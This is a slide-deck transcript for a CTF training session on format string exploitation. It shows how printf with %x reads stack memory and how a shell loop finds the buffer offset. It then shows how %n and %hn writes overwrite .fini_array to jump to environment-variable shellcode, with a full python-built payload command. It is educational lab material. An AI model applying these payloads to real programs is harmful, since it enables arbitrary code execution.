String format exploitation in 15"

Transcript

1. Exploiting format string in 15’’ CTF training session Julien Bachmann

   / @milkmix_

2. intro | source? Coming from variadic functions va_arg printf Missing

   format string When user can specify is format string

3. intro | consequence? Two possibilities display process memory modify process

   memory :)

4. intro | man 3 printf printf(“hex value: %x”, 42); int

   i; printf(“number of bytes so far%n”, &i); printf(“%2$s %1$s\n”, “world”, “Hello”);

5. read | detail printf(buf); printf(“%x”); 0x42424242 0x41414141 buf @ret %ebp

   local

6. read | detail printf(buf); printf(“%2$x”); 0x42424242 0x41414141 buf @ret %ebp

   local

7. read | find our buffer It is in the stack

   need to find the virtual argument to printf brute force it! possibly need to add [1-3] padding bytes to align on 4 bytes

8. read | our target

9. read | find our buffer for offset in `seq 0

   20`; do echo "offset=$offset"; ./strfmt "AAAA%$offset\$x"; echo; done | grep 4141 -B1

10. write | specific address Put it in our buffer Use

    %n to write intead of %x to read Check the system endianness

11. write | specific address ./strfmt `python -c 'print "B\x42\x42\x42\x42%6$n"'`

12. write | specific address

13. write | specific address What to overwrite? interesting variable GOT

    .dtor .fini_array checksec to validate writable zones

14. write | specific address

15. write | specific address How to write Endianness again ;)

    Not possible to write 0xffffdee8 (shellcode address in environment) in one pass Split in two 0xdee8 0xffff - 0xdee8 Use %hn to write only a word and not rewrite first part

16. write | specific address EGG=`python -c 'print "\x90"*100+"<shellcode>"'` ./strfmt `python

    -c 'print "B \x68\x96\x04\x08\x6a\x96\x04\x08%57055c%6$hn%8471c%7$hn"'` @<.fini_array> @<.fini_array> + 2 0xdee8 - 9 0xffff - 0xdee8

17. auto | libformatstr From hellman Brute force and format automatic

    generation :)